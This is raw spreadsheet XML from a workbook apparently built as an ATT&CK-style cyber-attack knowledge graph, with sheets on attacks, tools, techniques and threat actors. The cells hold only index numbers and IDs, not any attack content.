        <v>10688</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>10689</v>
      </c>
      <c r="B7" t="s">
        <v>10690</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>10691</v>
      </c>
      <c r="B8" t="s">
        <v>10692</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>10693</v>
      </c>
      <c r="B9" t="s">
        <v>10694</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>10695</v>
      </c>
      <c r="B10" t="s">
        <v>10696</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>10697</v>
      </c>
      <c r="B11" t="s">
        <v>10698</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>10699</v>
      </c>
      <c r="B12" t="s">
        <v>10700</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>10701</v>
      </c>
      <c r="B13" t="s">
        <v>10702</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>10703</v>
      </c>
      <c r="B14" t="s">
        <v>10704</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>10705</v>
      </c>
      <c r="B15" t="s">
        <v>10706</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>10707</v>
      </c>
      <c r="B16" t="s">
        <v>10708</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A17" t="s">
        <v>10709</v>
      </c>
      <c r="B17" t="s">
        <v>10710</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>10711</v>
      </c>
      <c r="B18" t="s">
        <v>10712</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A19" t="s">
        <v>10713</v>
      </c>
      <c r="B19" t="s">
        <v>10714</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A20" t="s">
        <v>10715</v>
      </c>
      <c r="B20" t="s">
        <v>10716</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A21" t="s">
        <v>10717</v>
      </c>
      <c r="B21" t="s">
        <v>10718</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A22" t="s">
        <v>10719</v>
      </c>
      <c r="B22" t="s">
        <v>10720</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A23" t="s">
        <v>10721</v>
      </c>
      <c r="B23" t="s">
        <v>10722</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A24" t="s">
        <v>10723</v>
      </c>
      <c r="B24" t="s">
        <v>10724</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A25" t="s">
        <v>10725</v>
      </c>
      <c r="B25" t="s">
        <v>10726</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A26" t="s">
        <v>10727</v>
      </c>
      <c r="B26" t="s">
        <v>10728</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A27" t="s">
        <v>10729</v>
      </c>
      <c r="B27" t="s">
        <v>10730</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A28" t="s">
        <v>10731</v>
      </c>
      <c r="B28" t="s">
        <v>10732</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A29" t="s">
        <v>10733</v>
      </c>
      <c r="B29" t="s">
        <v>10734</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A30" t="s">
        <v>10735</v>
      </c>
      <c r="B30" t="s">
        <v>10736</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A31" t="s">
        <v>10737</v>
      </c>
      <c r="B31" t="s">
        <v>10738</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A32" t="s">
        <v>10739</v>
      </c>
      <c r="B32" t="s">
        <v>10740</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A33" t="s">
        <v>10741</v>
      </c>
      <c r="B33" t="s">
        <v>10742</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A34" t="s">
        <v>10743</v>
      </c>
      <c r="B34" t="s">
        <v>10744</v>
      </c>
    </row>
    <row r="35" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A35" t="s">
        <v>10745</v>
      </c>
      <c r="B35" t="s">
        <v>10746</v>
      </c>
    </row>
    <row r="36" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A36" t="s">
        <v>10747</v>
      </c>
      <c r="B36" t="s">
        <v>10748</v>
      </c>
    </row>
    <row r="37" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A37" t="s">
        <v>10749</v>
      </c>
      <c r="B37" t="s">
        <v>10750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E9ADE-8043-4A94-8EF5-898B708849CF}">
  <dimension ref="A1:B9"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="H14" sqref="H14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>10658</v>
      </c>
      <c r="B1" t="s">
        <v>10659</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>10751</v>
      </c>
      <c r="B2" t="s">
        <v>10752</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>10753</v>
      </c>
      <c r="B3" t="s">
        <v>10754</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>10755</v>
      </c>
      <c r="B4" t="s">
        <v>10756</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>10757</v>
      </c>
      <c r="B5" t="s">
        <v>10758</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>10759</v>
      </c>
      <c r="B6" t="s">
        <v>10760</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>10761</v>
      </c>
      <c r="B7" t="s">
        <v>10762</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>10763</v>
      </c>
      <c r="B8" t="s">
        <v>10764</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>10765</v>
      </c>
      <c r="B9" t="s">
        <v>10766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06293-F0F0-469B-8C44-13A4720459D1}">
  <dimension ref="A1:B9"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G14" sqref="G14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>10658</v>
      </c>
      <c r="B1" t="s">
        <v>10659</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>10767</v>
      </c>
      <c r="B2" t="s">
        <v>10768</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>10769</v>
      </c>
      <c r="B3" t="s">
        <v>10770</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>10771</v>
      </c>
      <c r="B4" t="s">
        <v>10772</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>10773</v>
      </c>
      <c r="B5" t="s">
        <v>10774</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>10775</v>
      </c>
      <c r="B6" t="s">
        <v>10776</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>10777</v>
      </c>
      <c r="B7" t="s">
        <v>10778</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>10779</v>
      </c>
      <c r="B8" t="s">
        <v>10780</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>10781</v>
      </c>
      <c r="B9" t="s">
        <v>10782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2159D-14D8-4019-A323-8104010D21F9}">
  <dimension ref="A1:B5"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="G16" sqref="G16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>10658</v>
      </c>
      <c r="B1" t="s">
        <v>10659</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>10783</v>
      </c>
      <c r="B2" t="s">
        <v>10784</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>10662</v>
      </c>
      <c r="B3" t="s">
        <v>10785</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>10786</v>
      </c>
      <c r="B4" t="s">
        <v>10787</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>10788</v>
      </c>
      <c r="B5" t="s">
        <v>10789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02E3C-2CD9-4C07-85A8-D6B3FD5996F8}">
  <dimension ref="A1:B4"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D11" sqref="D11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>10658</v>
      </c>
      <c r="B1" t="s">
        <v>10659</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>10672</v>
      </c>
      <c r="B2" t="s">
        <v>10673</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>10674</v>
      </c>
      <c r="B3" t="s">
        <v>10675</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>10676</v>
      </c>
      <c r="B4" t="s">
        <v>10677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129BA-217C-43A8-8B97-DA4979C8324E}">
  <dimension ref="A1:E10"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1" s="6" t="s">
        <v>15</v>
      </c>
      <c r="B1" s="6" t="s">
        <v>10417</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
    </row>
    <row r="2" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2" s="6">
        <v>200001</v>
      </c>
      <c r="B2" s="6" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="3"/>
      <c r="D2" s="3"/>
      <c r="E2" s="3"/>
    </row>
    <row r="3" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3" s="6">
        <v>200002</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>1</v>
      </c>
      <c r="C3" s="3"/>
      <c r="D3" s="3"/>
      <c r="E3" s="3"/>
    </row>
    <row r="4" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4" s="6">
        <v>200003</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>2</v>
      </c>
      <c r="C4" s="3"/>
      <c r="D4" s="3"/>
      <c r="E4" s="3"/>
    </row>
    <row r="5" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5" s="6">
        <v>200004</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>3</v>
      </c>
      <c r="C5" s="3"/>
      <c r="D5" s="3"/>
      <c r="E5" s="3"/>
    </row>
    <row r="6" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6" s="6">
        <v>200005</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>4</v>
      </c>
      <c r="C6" s="3"/>
      <c r="D6" s="3"/>
      <c r="E6" s="3"/>
    </row>
    <row r="7" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7" s="6">
        <v>200006</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>5</v>
      </c>
      <c r="C7" s="3"/>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
    </row>
    <row r="8" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8" s="6">
        <v>200007</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>6</v>
      </c>
      <c r="C8" s="3"/>
      <c r="D8" s="3"/>
      <c r="E8" s="3"/>
    </row>
    <row r="9" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9" s="3"/>
      <c r="B9" s="3"/>
      <c r="C9" s="3"/>
      <c r="D9" s="3"/>
      <c r="E9" s="3"/>
    </row>
    <row r="10" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A10" s="3"/>
      <c r="B10" s="3"/>
      <c r="C10" s="3"/>
      <c r="D10" s="3"/>
      <c r="E10" s="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28</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="28" baseType="lpstr">
      <vt:lpstr>网络攻击</vt:lpstr>
      <vt:lpstr>ATT&amp;CK</vt:lpstr>
      <vt:lpstr>渗透流程</vt:lpstr>
      <vt:lpstr>工具1</vt:lpstr>
      <vt:lpstr>漏洞检测</vt:lpstr>
      <vt:lpstr>渗透攻击</vt:lpstr>
      <vt:lpstr>后渗透</vt:lpstr>
      <vt:lpstr>渗透分类</vt:lpstr>
      <vt:lpstr>网络威胁行为体</vt:lpstr>
      <vt:lpstr>数据源</vt:lpstr>
      <vt:lpstr>数据源组成</vt:lpstr>
      <vt:lpstr>组织</vt:lpstr>
      <vt:lpstr>文献</vt:lpstr>
      <vt:lpstr>工具</vt:lpstr>
      <vt:lpstr>技术种类</vt:lpstr>
      <vt:lpstr>技术</vt:lpstr>
      <vt:lpstr>包含1（网络攻击、技术）</vt:lpstr>
      <vt:lpstr>包含2（网络攻击、工具）</vt:lpstr>
      <vt:lpstr>包含3（工具、技术）</vt:lpstr>
      <vt:lpstr>包含4（工具、文献）</vt:lpstr>
      <vt:lpstr>包含5（工具、组织）</vt:lpstr>
      <vt:lpstr>包含6（组织、工具）</vt:lpstr>
      <vt:lpstr>包含7（组织、技术）</vt:lpstr>
      <vt:lpstr>包含8（组织、文献）</vt:lpstr>
      <vt:lpstr>包含9（数据源、数据源组成）</vt:lpstr>
      <vt:lpstr>包含10（数据源、文献）</vt:lpstr>
      <vt:lpstr>包含11（数据源组成、技术）</vt:lpstr>
      <vt:lpstr>包含12（技术种类、技术）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这就是会长</dc:creator>
  <cp:lastModifiedBy>86156</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-22T07:58:52Z</dcterms:modified>
</cp:coreProperties>
</file>